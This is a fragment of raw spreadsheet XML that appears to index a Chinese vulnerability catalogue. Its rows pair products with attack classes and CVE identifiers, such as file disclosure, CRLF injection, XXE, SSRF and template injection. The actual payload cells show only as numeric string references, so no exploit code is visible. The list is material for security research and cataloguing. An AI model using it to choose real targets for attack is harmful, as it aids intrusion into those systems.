      <c r="D664" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Dnsmasq Config_文件泄露</v>
      </c>
      <c r="E664" s="6" t="s">
        <v>2279</v>
      </c>
      <c r="F664" s="4" t="s">
        <v>2280</v>
      </c>
    </row>
    <row r="665" s="4" customFormat="1" spans="1:6">
      <c r="A665" s="2" t="s">
        <v>2281</v>
      </c>
      <c r="B665" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C665" s="2"/>
      <c r="D665" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Docker Cloud Yaml_文件泄露</v>
      </c>
      <c r="E665" s="6" t="s">
        <v>2282</v>
      </c>
      <c r="F665" s="4" t="s">
        <v>2283</v>
      </c>
    </row>
    <row r="666" s="4" customFormat="1" spans="1:6">
      <c r="A666" s="2" t="s">
        <v>2284</v>
      </c>
      <c r="B666" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C666" s="2"/>
      <c r="D666" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Elastic Kibana Config_文件泄露</v>
      </c>
      <c r="E666" s="6" t="s">
        <v>2285</v>
      </c>
      <c r="F666" s="4" t="s">
        <v>2286</v>
      </c>
    </row>
    <row r="667" s="4" customFormat="1" spans="1:6">
      <c r="A667" s="2" t="s">
        <v>2287</v>
      </c>
      <c r="B667" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C667" s="2"/>
      <c r="D667" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Git Mailmap _文件泄露</v>
      </c>
      <c r="E667" s="6" t="s">
        <v>2288</v>
      </c>
      <c r="F667" s="4" t="s">
        <v>2289</v>
      </c>
    </row>
    <row r="668" s="4" customFormat="1" spans="1:6">
      <c r="A668" s="2" t="s">
        <v>2290</v>
      </c>
      <c r="B668" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C668" s="2"/>
      <c r="D668" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Haproxy Config_文件泄露</v>
      </c>
      <c r="E668" s="6" t="s">
        <v>2291</v>
      </c>
      <c r="F668" s="4" t="s">
        <v>2292</v>
      </c>
    </row>
    <row r="669" s="4" customFormat="1" spans="1:6">
      <c r="A669" s="2" t="s">
        <v>2293</v>
      </c>
      <c r="B669" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C669" s="2"/>
      <c r="D669" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Icecast Config_文件泄露</v>
      </c>
      <c r="E669" s="6" t="s">
        <v>2294</v>
      </c>
      <c r="F669" s="4" t="s">
        <v>2295</v>
      </c>
    </row>
    <row r="670" s="4" customFormat="1" spans="1:6">
      <c r="A670" s="2" t="s">
        <v>2296</v>
      </c>
      <c r="B670" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C670" s="2"/>
      <c r="D670" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Lighttpd Config_文件泄露</v>
      </c>
      <c r="E670" s="6" t="s">
        <v>2297</v>
      </c>
      <c r="F670" s="4" t="s">
        <v>2298</v>
      </c>
    </row>
    <row r="671" s="4" customFormat="1" spans="1:6">
      <c r="A671" s="2" t="s">
        <v>500</v>
      </c>
      <c r="B671" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C671" s="2"/>
      <c r="D671" s="2" t="str">
        <f t="shared" si="10"/>
        <v>PHP_文件泄露</v>
      </c>
      <c r="E671" s="6" t="s">
        <v>2299</v>
      </c>
      <c r="F671" s="4" t="s">
        <v>2300</v>
      </c>
    </row>
    <row r="672" s="4" customFormat="1" spans="1:6">
      <c r="A672" s="2" t="s">
        <v>2301</v>
      </c>
      <c r="B672" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C672" s="2"/>
      <c r="D672" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Redmine settings_文件泄露</v>
      </c>
      <c r="E672" s="6" t="s">
        <v>2302</v>
      </c>
      <c r="F672" s="4" t="s">
        <v>2303</v>
      </c>
    </row>
    <row r="673" s="4" customFormat="1" spans="1:6">
      <c r="A673" s="2" t="s">
        <v>2304</v>
      </c>
      <c r="B673" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C673" s="2"/>
      <c r="D673" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Secret Token Ruby_文件泄露</v>
      </c>
      <c r="E673" s="6" t="s">
        <v>2305</v>
      </c>
      <c r="F673" s="4" t="s">
        <v>2306</v>
      </c>
    </row>
    <row r="674" s="4" customFormat="1" spans="1:6">
      <c r="A674" s="2" t="s">
        <v>2307</v>
      </c>
      <c r="B674" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C674" s="2"/>
      <c r="D674" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Socks VPN_文件泄露</v>
      </c>
      <c r="E674" s="6" t="s">
        <v>2308</v>
      </c>
      <c r="F674" s="4" t="s">
        <v>2309</v>
      </c>
    </row>
    <row r="675" s="4" customFormat="1" spans="1:6">
      <c r="A675" s="2" t="s">
        <v>2310</v>
      </c>
      <c r="B675" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C675" s="2"/>
      <c r="D675" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Symfony security_文件泄露</v>
      </c>
      <c r="E675" s="6" t="s">
        <v>2311</v>
      </c>
      <c r="F675" s="4" t="s">
        <v>2312</v>
      </c>
    </row>
    <row r="676" s="4" customFormat="1" spans="1:6">
      <c r="A676" s="2" t="s">
        <v>2313</v>
      </c>
      <c r="B676" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C676" s="2"/>
      <c r="D676" s="2" t="str">
        <f t="shared" si="10"/>
        <v>WS FTP_文件泄露</v>
      </c>
      <c r="E676" s="6" t="s">
        <v>2314</v>
      </c>
      <c r="F676" s="4" t="s">
        <v>2315</v>
      </c>
    </row>
    <row r="677" s="4" customFormat="1" spans="1:6">
      <c r="A677" s="2" t="s">
        <v>2316</v>
      </c>
      <c r="B677" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C677" s="2"/>
      <c r="D677" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Production Log_文件泄露</v>
      </c>
      <c r="E677" s="6" t="s">
        <v>2317</v>
      </c>
      <c r="F677" s="4" t="s">
        <v>2318</v>
      </c>
    </row>
    <row r="678" s="4" customFormat="1" spans="1:6">
      <c r="A678" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B678" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C678" s="2"/>
      <c r="D678" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Joomla_文件泄露</v>
      </c>
      <c r="E678" s="6" t="s">
        <v>2319</v>
      </c>
      <c r="F678" s="4" t="s">
        <v>2320</v>
      </c>
    </row>
    <row r="679" s="4" customFormat="1" spans="1:6">
      <c r="A679" s="2" t="s">
        <v>2321</v>
      </c>
      <c r="B679" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C679" s="2"/>
      <c r="D679" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Mysql History_文件泄露</v>
      </c>
      <c r="E679" s="6" t="s">
        <v>2322</v>
      </c>
      <c r="F679" s="4" t="s">
        <v>2323</v>
      </c>
    </row>
    <row r="680" s="4" customFormat="1" spans="1:6">
      <c r="A680" s="2" t="s">
        <v>2324</v>
      </c>
      <c r="B680" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C680" s="2"/>
      <c r="D680" s="2" t="str">
        <f t="shared" si="10"/>
        <v>启航Digital Signage_文件泄露</v>
      </c>
      <c r="E680" s="6" t="s">
        <v>2325</v>
      </c>
      <c r="F680" s="4" t="s">
        <v>2326</v>
      </c>
    </row>
    <row r="681" s="4" customFormat="1" spans="1:6">
      <c r="A681" s="2" t="s">
        <v>1565</v>
      </c>
      <c r="B681" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C681" s="2"/>
      <c r="D681" s="2" t="str">
        <f t="shared" si="10"/>
        <v>万户_文件泄露</v>
      </c>
      <c r="E681" s="6" t="s">
        <v>2327</v>
      </c>
      <c r="F681" s="4" t="s">
        <v>2328</v>
      </c>
    </row>
    <row r="682" s="4" customFormat="1" spans="1:6">
      <c r="A682" s="2" t="s">
        <v>241</v>
      </c>
      <c r="B682" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="C682" s="2" t="s">
        <v>2329</v>
      </c>
      <c r="D682" s="2" t="str">
        <f t="shared" si="10"/>
        <v>泛微_文件泄露_CVE-2024-7340</v>
      </c>
      <c r="E682" s="6" t="s">
        <v>2330</v>
      </c>
      <c r="F682" s="4" t="s">
        <v>2331</v>
      </c>
    </row>
    <row r="683" s="4" customFormat="1" spans="1:6">
      <c r="A683" s="2" t="s">
        <v>443</v>
      </c>
      <c r="B683" s="2" t="s">
        <v>2332</v>
      </c>
      <c r="C683" s="2" t="s">
        <v>2333</v>
      </c>
      <c r="D683" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Apache_CRLF注入_CVE-2016-4975</v>
      </c>
      <c r="E683" s="6" t="s">
        <v>2334</v>
      </c>
      <c r="F683" s="4" t="s">
        <v>2335</v>
      </c>
    </row>
    <row r="684" s="4" customFormat="1" spans="1:6">
      <c r="A684" s="2" t="s">
        <v>2336</v>
      </c>
      <c r="B684" s="2" t="s">
        <v>2332</v>
      </c>
      <c r="C684" s="2" t="s">
        <v>2337</v>
      </c>
      <c r="D684" s="2" t="str">
        <f t="shared" si="10"/>
        <v>OpenVPN Access Server_CRLF注入_CVE-2017-5868</v>
      </c>
      <c r="E684" s="6" t="s">
        <v>2338</v>
      </c>
      <c r="F684" s="4" t="s">
        <v>2339</v>
      </c>
    </row>
    <row r="685" s="4" customFormat="1" spans="1:6">
      <c r="A685" s="2" t="s">
        <v>2340</v>
      </c>
      <c r="B685" s="2" t="s">
        <v>2332</v>
      </c>
      <c r="C685" s="2" t="s">
        <v>2341</v>
      </c>
      <c r="D685" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Sercomm VD Smart Modems_CRLF注入_CVE-2021-27132</v>
      </c>
      <c r="E685" s="6" t="s">
        <v>2342</v>
      </c>
      <c r="F685" s="4" t="s">
        <v>2343</v>
      </c>
    </row>
    <row r="686" s="4" customFormat="1" spans="1:6">
      <c r="A686" s="2" t="s">
        <v>2344</v>
      </c>
      <c r="B686" s="2" t="s">
        <v>2332</v>
      </c>
      <c r="C686" s="2" t="s">
        <v>2345</v>
      </c>
      <c r="D686" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Microweber_CRLF注入_CVE-2022-0666</v>
      </c>
      <c r="E686" s="6" t="s">
        <v>2346</v>
      </c>
      <c r="F686" s="4" t="s">
        <v>2347</v>
      </c>
    </row>
    <row r="687" s="4" customFormat="1" spans="1:6">
      <c r="A687" s="2" t="s">
        <v>2348</v>
      </c>
      <c r="B687" s="2" t="s">
        <v>2332</v>
      </c>
      <c r="C687" s="2" t="s">
        <v>2349</v>
      </c>
      <c r="D687" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Kerio Control_CRLF注入_CVE-2024-52875</v>
      </c>
      <c r="E687" s="6" t="s">
        <v>2350</v>
      </c>
      <c r="F687" s="4" t="s">
        <v>2351</v>
      </c>
    </row>
    <row r="688" s="4" customFormat="1" spans="1:6">
      <c r="A688" s="2" t="s">
        <v>504</v>
      </c>
      <c r="B688" s="2" t="s">
        <v>2332</v>
      </c>
      <c r="C688" s="2"/>
      <c r="D688" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Rails_CRLF注入</v>
      </c>
      <c r="E688" s="6" t="s">
        <v>2352</v>
      </c>
      <c r="F688" s="4" t="s">
        <v>2353</v>
      </c>
    </row>
    <row r="689" s="4" customFormat="1" spans="1:6">
      <c r="A689" s="2" t="s">
        <v>2354</v>
      </c>
      <c r="B689" s="2" t="s">
        <v>2355</v>
      </c>
      <c r="C689" s="2" t="s">
        <v>2356</v>
      </c>
      <c r="D689" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Oracle Business Intelligence Publisher_XML外部实体注入_CVE-2019-2767</v>
      </c>
      <c r="E689" s="6" t="s">
        <v>2357</v>
      </c>
      <c r="F689" s="4" t="s">
        <v>2358</v>
      </c>
    </row>
    <row r="690" s="4" customFormat="1" spans="1:6">
      <c r="A690" s="2" t="s">
        <v>443</v>
      </c>
      <c r="B690" s="2" t="s">
        <v>2355</v>
      </c>
      <c r="C690" s="2" t="s">
        <v>2359</v>
      </c>
      <c r="D690" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Apache_XML外部实体注入_CVE-2017-12629</v>
      </c>
      <c r="E690" s="6" t="s">
        <v>2360</v>
      </c>
      <c r="F690" s="4" t="s">
        <v>2361</v>
      </c>
    </row>
    <row r="691" s="4" customFormat="1" spans="1:6">
      <c r="A691" s="2" t="s">
        <v>1227</v>
      </c>
      <c r="B691" s="2" t="s">
        <v>2362</v>
      </c>
      <c r="C691" s="2" t="s">
        <v>2363</v>
      </c>
      <c r="D691" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Citrix_代码注入_CVE-2020-8194</v>
      </c>
      <c r="E691" s="6" t="s">
        <v>2364</v>
      </c>
      <c r="F691" s="4" t="s">
        <v>2365</v>
      </c>
    </row>
    <row r="692" s="4" customFormat="1" spans="1:6">
      <c r="A692" s="2" t="s">
        <v>1838</v>
      </c>
      <c r="B692" s="2" t="s">
        <v>2362</v>
      </c>
      <c r="C692" s="2" t="s">
        <v>2366</v>
      </c>
      <c r="D692" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Netsweeper_代码注入_CVE-2020-13167</v>
      </c>
      <c r="E692" s="6" t="s">
        <v>2367</v>
      </c>
      <c r="F692" s="4" t="s">
        <v>2368</v>
      </c>
    </row>
    <row r="693" s="4" customFormat="1" spans="1:6">
      <c r="A693" s="2" t="s">
        <v>1828</v>
      </c>
      <c r="B693" s="2" t="s">
        <v>2369</v>
      </c>
      <c r="C693" s="2" t="s">
        <v>2370</v>
      </c>
      <c r="D693" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Keycloak_服务端请求伪造_CVE-2020-10770</v>
      </c>
      <c r="E693" s="6" t="s">
        <v>2371</v>
      </c>
      <c r="F693" s="4" t="s">
        <v>2372</v>
      </c>
    </row>
    <row r="694" s="4" customFormat="1" spans="1:6">
      <c r="A694" s="2" t="s">
        <v>1293</v>
      </c>
      <c r="B694" s="2" t="s">
        <v>2369</v>
      </c>
      <c r="C694" s="2" t="s">
        <v>2373</v>
      </c>
      <c r="D694" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Jellyfin_服务端请求伪造_CVE-2021-29490</v>
      </c>
      <c r="E694" s="6" t="s">
        <v>2374</v>
      </c>
      <c r="F694" s="4" t="s">
        <v>2375</v>
      </c>
    </row>
    <row r="695" s="4" customFormat="1" spans="1:6">
      <c r="A695" s="2" t="s">
        <v>2376</v>
      </c>
      <c r="B695" s="2" t="s">
        <v>2369</v>
      </c>
      <c r="C695" s="2" t="s">
        <v>2377</v>
      </c>
      <c r="D695" s="2" t="str">
        <f t="shared" si="10"/>
        <v>MeterSphere_服务端请求伪造_CVE-2022-23544</v>
      </c>
      <c r="E695" s="6" t="s">
        <v>2378</v>
      </c>
      <c r="F695" s="4" t="s">
        <v>2379</v>
      </c>
    </row>
    <row r="696" s="4" customFormat="1" spans="1:6">
      <c r="A696" s="2" t="s">
        <v>2380</v>
      </c>
      <c r="B696" s="2" t="s">
        <v>2369</v>
      </c>
      <c r="C696" s="2" t="s">
        <v>2381</v>
      </c>
      <c r="D696" s="2" t="str">
        <f t="shared" si="10"/>
        <v>ChatGPT个人专用版_服务端请求伪造_CVE-2024-27564</v>
      </c>
      <c r="E696" s="6" t="s">
        <v>2382</v>
      </c>
      <c r="F696" s="4" t="s">
        <v>2383</v>
      </c>
    </row>
    <row r="697" s="4" customFormat="1" spans="1:6">
      <c r="A697" s="2" t="s">
        <v>2384</v>
      </c>
      <c r="B697" s="2" t="s">
        <v>2369</v>
      </c>
      <c r="C697" s="2" t="s">
        <v>2385</v>
      </c>
      <c r="D697" s="2" t="str">
        <f t="shared" si="10"/>
        <v>MindsDB_服务端请求伪造_CVE-2024-24759</v>
      </c>
      <c r="E697" s="6" t="s">
        <v>2386</v>
      </c>
      <c r="F697" s="4" t="s">
        <v>2387</v>
      </c>
    </row>
    <row r="698" s="4" customFormat="1" spans="1:6">
      <c r="A698" s="2" t="s">
        <v>1243</v>
      </c>
      <c r="B698" s="2" t="s">
        <v>2369</v>
      </c>
      <c r="C698" s="2" t="s">
        <v>2388</v>
      </c>
      <c r="D698" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Next_服务端请求伪造_CVE-2024-34351</v>
      </c>
      <c r="E698" s="6" t="s">
        <v>2389</v>
      </c>
      <c r="F698" s="4" t="s">
        <v>2390</v>
      </c>
    </row>
    <row r="699" s="4" customFormat="1" spans="1:6">
      <c r="A699" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B699" s="2" t="s">
        <v>2369</v>
      </c>
      <c r="C699" s="2" t="s">
        <v>2391</v>
      </c>
      <c r="D699" s="2" t="str">
        <f t="shared" si="10"/>
        <v>WordPress_服务端请求伪造_CVE-2024-27954</v>
      </c>
      <c r="E699" s="6" t="s">
        <v>2392</v>
      </c>
      <c r="F699" s="4" t="s">
        <v>2393</v>
      </c>
    </row>
    <row r="700" s="4" customFormat="1" spans="1:6">
      <c r="A700" s="2" t="s">
        <v>2394</v>
      </c>
      <c r="B700" s="2" t="s">
        <v>2369</v>
      </c>
      <c r="C700" s="2"/>
      <c r="D700" s="2" t="str">
        <f t="shared" si="10"/>
        <v>TiTiler_服务端请求伪造</v>
      </c>
      <c r="E700" s="6" t="s">
        <v>2395</v>
      </c>
      <c r="F700" s="4" t="s">
        <v>2396</v>
      </c>
    </row>
    <row r="701" s="4" customFormat="1" spans="1:6">
      <c r="A701" s="2" t="s">
        <v>2397</v>
      </c>
      <c r="B701" s="2" t="s">
        <v>2369</v>
      </c>
      <c r="C701" s="2"/>
      <c r="D701" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Umbraco_服务端请求伪造</v>
      </c>
      <c r="E701" s="6" t="s">
        <v>2398</v>
      </c>
      <c r="F701" s="4" t="s">
        <v>2399</v>
      </c>
    </row>
    <row r="702" s="4" customFormat="1" spans="1:6">
      <c r="A702" s="2" t="s">
        <v>2400</v>
      </c>
      <c r="B702" s="2" t="s">
        <v>2369</v>
      </c>
      <c r="C702" s="2"/>
      <c r="D702" s="2" t="str">
        <f t="shared" si="10"/>
        <v>UEditor_服务端请求伪造</v>
      </c>
      <c r="E702" s="6" t="s">
        <v>2401</v>
      </c>
      <c r="F702" s="4" t="s">
        <v>2402</v>
      </c>
    </row>
    <row r="703" s="4" customFormat="1" spans="1:6">
      <c r="A703" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B703" s="2" t="s">
        <v>2369</v>
      </c>
      <c r="C703" s="2" t="s">
        <v>2403</v>
      </c>
      <c r="D703" s="2" t="str">
        <f t="shared" si="10"/>
        <v>WordPress_服务端请求伪造_CVE-2022-45835</v>
      </c>
      <c r="E703" s="6" t="s">
        <v>2404</v>
      </c>
      <c r="F703" s="4" t="s">
        <v>2405</v>
      </c>
    </row>
    <row r="704" s="4" customFormat="1" spans="1:6">
      <c r="A704" s="2" t="s">
        <v>2406</v>
      </c>
      <c r="B704" s="2" t="s">
        <v>2369</v>
      </c>
      <c r="C704" s="2" t="s">
        <v>2407</v>
      </c>
      <c r="D704" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Hurrakify_服务端请求伪造_CVE-2024-54330</v>
      </c>
      <c r="E704" s="6" t="s">
        <v>2408</v>
      </c>
      <c r="F704" s="4" t="s">
        <v>2409</v>
      </c>
    </row>
    <row r="705" s="4" customFormat="1" spans="1:6">
      <c r="A705" s="2" t="s">
        <v>2410</v>
      </c>
      <c r="B705" s="2" t="s">
        <v>2369</v>
      </c>
      <c r="C705" s="2" t="s">
        <v>2411</v>
      </c>
      <c r="D705" s="2" t="str">
        <f t="shared" si="10"/>
        <v>Qualitor_服务端请求伪造_CVE-2024-48360</v>
      </c>
      <c r="E705" s="6" t="s">
        <v>2412</v>
      </c>
      <c r="F705" s="4" t="s">
        <v>2413</v>
      </c>
    </row>
    <row r="706" s="4" customFormat="1" spans="1:6">
      <c r="A706" s="2" t="s">
        <v>2414</v>
      </c>
      <c r="B706" s="2" t="s">
        <v>2369</v>
      </c>
      <c r="C706" s="2" t="s">
        <v>256</v>
      </c>
      <c r="D706" s="2" t="str">
        <f t="shared" ref="D706:D708" si="11">_xlfn.TEXTJOIN("_",TRUE,A706:C706)</f>
        <v>Zimbra Collaboration Suite_服务端请求伪造</v>
      </c>
      <c r="E706" s="6" t="s">
        <v>2415</v>
      </c>
      <c r="F706" s="4" t="s">
        <v>2416</v>
      </c>
    </row>
    <row r="707" s="4" customFormat="1" spans="1:6">
      <c r="A707" s="2" t="s">
        <v>2417</v>
      </c>
      <c r="B707" s="2" t="s">
        <v>2418</v>
      </c>
      <c r="C707" s="2"/>
      <c r="D707" s="2" t="str">
        <f t="shared" si="11"/>
        <v>Twig PHP服务端_模板注入</v>
      </c>
      <c r="E707" s="6" t="s">
        <v>2419</v>
      </c>
      <c r="F707" s="4" t="s">
        <v>2420</v>
      </c>
    </row>
    <row r="708" s="4" customFormat="1" spans="1:6">
      <c r="A708" s="2" t="s">
        <v>2421</v>
      </c>
      <c r="B708" s="2" t="s">
        <v>2418</v>
      </c>
      <c r="C708" s="2" t="s">
        <v>2422</v>
      </c>
      <c r="D708" s="2" t="str">
        <f t="shared" si="11"/>
        <v>ServiceNow UI Macros_模板注入_CVE-2024-4879</v>
      </c>
      <c r="E708" s="6" t="s">
        <v>2423</v>
      </c>
      <c r="F708" s="4" t="s">
        <v>2424</v>
      </c>
    </row>
  </sheetData>
  <autoFilter xmlns:etc="http://www.wps.cn/officeDocument/2017/etCustomData" ref="A1:F70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9"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="C20" sqref="C20"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14" outlineLevelCol="6"/>
  <cols>
    <col min="1" max="1" width="27.2727272727273" style="2" customWidth="1"/>
    <col min="2" max="2" width="17.3636363636364" style="2" customWidth="1"/>
    <col min="3" max="3" width="9" style="2"/>
    <col min="4" max="4" width="38.0909090909091" style="2" customWidth="1"/>
    <col min="5" max="5" width="255.636363636364" style="2" customWidth="1"/>
    <col min="6" max="6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2425</v>
      </c>
    </row>
    <row r="2" spans="1:7">
      <c r="A2" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>256</v>
      </c>
      <c r="D2" s="2" t="s">
        <v>2426</v>
      </c>
      <c r="E2" s="2" t="s">
        <v>2427</v>
      </c>
      <c r="F2" s="2" t="s">
        <v>2428</v>
      </c>
      <c r="G2" s="4" t="s">
        <v>2429</v>
      </c>
    </row>
    <row r="3" spans="1:7">
      <c r="A3" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C3" s="2" t="s">
        <v>256</v>
      </c>
      <c r="D3" s="2" t="s">
        <v>2426</v>
      </c>
      <c r="E3" s="2" t="s">
        <v>2430</v>
      </c>
      <c r="F3" s="2" t="s">
        <v>2431</v>
      </c>
      <c r="G3" s="4" t="s">
        <v>2429</v>
      </c>
    </row>
    <row r="4" spans="1:7">
      <c r="A4" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C4" s="2" t="s">
        <v>256</v>
      </c>
      <c r="D4" s="2" t="s">
        <v>2426</v>
      </c>
      <c r="E4" s="2" t="s">
        <v>2432</v>
      </c>
      <c r="F4" s="2" t="s">
        <v>2433</v>
      </c>
      <c r="G4" s="4" t="s">
        <v>2429</v>
      </c>
    </row>
    <row r="5" spans="1:7">
      <c r="A5" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>256</v>
      </c>
      <c r="D5" s="2" t="s">
        <v>2426</v>
      </c>
      <c r="E5" s="2" t="s">
        <v>2434</v>
      </c>
      <c r="F5" s="2" t="s">
        <v>2435</v>
      </c>
      <c r="G5" s="4" t="s">
        <v>2429</v>
      </c>
    </row>
    <row r="6" spans="1:7">
      <c r="A6" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B6" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C6" s="2" t="s">
        <v>256</v>
      </c>
      <c r="D6" s="2" t="s">
        <v>2426</v>
      </c>
      <c r="E6" s="2" t="s">
        <v>2436</v>
      </c>
      <c r="F6" s="2" t="s">
        <v>2437</v>
      </c>
      <c r="G6" s="4" t="s">
        <v>2429</v>
      </c>
    </row>
    <row r="7" spans="1:7">
      <c r="A7" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B7" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C7" s="2" t="s">
        <v>256</v>
      </c>
      <c r="D7" s="2" t="s">
        <v>2426</v>
      </c>
      <c r="E7" s="2" t="s">
        <v>2438</v>
      </c>
      <c r="F7" s="2" t="s">
        <v>2439</v>
      </c>
      <c r="G7" s="4" t="s">
        <v>2440</v>
      </c>
    </row>
    <row r="8" spans="1:7">
      <c r="A8" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B8" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>256</v>
      </c>
      <c r="D8" s="2" t="s">
        <v>2426</v>
      </c>
      <c r="E8" s="2" t="s">
        <v>2441</v>
      </c>
      <c r="F8" s="2" t="s">
        <v>2442</v>
      </c>
      <c r="G8" s="4" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="9" spans="1:7">
      <c r="A9" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B9" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C9" s="2" t="s">
        <v>256</v>
      </c>
      <c r="D9" s="2" t="s">
        <v>2426</v>
      </c>
      <c r="E9" s="2" t="s">
        <v>2444</v>
      </c>
      <c r="F9" s="2" t="s">
        <v>2445</v>
      </c>
      <c r="G9" s="4" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="10" spans="1:7">
      <c r="A10" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B10" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C10" s="2" t="s">
        <v>256</v>
      </c>
      <c r="D10" s="2" t="s">
        <v>2426</v>
      </c>
      <c r="E10" s="2" t="s">
        <v>2444</v>
      </c>
      <c r="F10" s="2" t="s">
        <v>2446</v>
      </c>
      <c r="G10" s="4" t="s">
        <v>2440</v>
      </c>
    </row>
    <row r="11" spans="1:7">
      <c r="A11" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B11" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C11" s="2" t="s">
        <v>256</v>
      </c>
      <c r="D11" s="2" t="s">
        <v>2426</v>
      </c>
      <c r="E11" s="2" t="s">
        <v>2447</v>
      </c>
      <c r="F11" s="2" t="s">
        <v>183</v>
      </c>
      <c r="G11" s="4" t="s">
        <v>2440</v>
      </c>
    </row>
    <row r="12" spans="1:7">
      <c r="A12" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B12" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C12" s="2" t="s">
        <v>256</v>
      </c>
      <c r="D12" s="2" t="s">
        <v>2426</v>
      </c>
      <c r="E12" s="2" t="s">
        <v>2448</v>
      </c>
      <c r="F12" s="2" t="s">
        <v>2449</v>
      </c>
      <c r="G12" s="4" t="s">
        <v>2440</v>
      </c>
    </row>
    <row r="13" spans="1:7">
      <c r="A13" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B13" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C13" s="2" t="s">
        <v>256</v>
      </c>
      <c r="D13" s="2" t="s">
        <v>2426</v>
      </c>
      <c r="E13" s="2" t="s">
        <v>2450</v>
      </c>
      <c r="F13" s="2" t="s">
        <v>2451</v>
      </c>
      <c r="G13" s="4" t="s">
        <v>2429</v>
      </c>
    </row>
    <row r="14" spans="1:7">
      <c r="A14" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B14" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C14" s="2" t="s">
        <v>256</v>
      </c>
      <c r="D14" s="2" t="s">
        <v>2426</v>
      </c>
      <c r="E14" s="2" t="s">
        <v>2452</v>
      </c>
      <c r="F14" s="2" t="s">
        <v>2453</v>
      </c>
      <c r="G14" s="4" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="15" spans="1:7">
      <c r="A15" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B15" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C15" s="2" t="s">
        <v>256</v>
      </c>
      <c r="D15" s="2" t="s">
        <v>2426</v>
      </c>
      <c r="E15" s="2" t="s">
        <v>2454</v>
      </c>
      <c r="F15" s="2" t="s">
        <v>2455</v>
      </c>
      <c r="G15" s="4" t="s">
        <v>2429</v>
      </c>
    </row>
    <row r="16" spans="1:7">
      <c r="A16" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B16" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C16" s="2" t="s">
        <v>256</v>
      </c>
      <c r="D16" s="2" t="s">
        <v>2426</v>
      </c>
      <c r="E16" s="2" t="s">
        <v>2456</v>
      </c>
      <c r="F16" s="2" t="s">
        <v>2457</v>
      </c>
      <c r="G16" s="4" t="s">
        <v>2429</v>
      </c>
    </row>
    <row r="17" spans="1:7">
      <c r="A17" s="2" t="s">
        <v>19</v>
      </c>
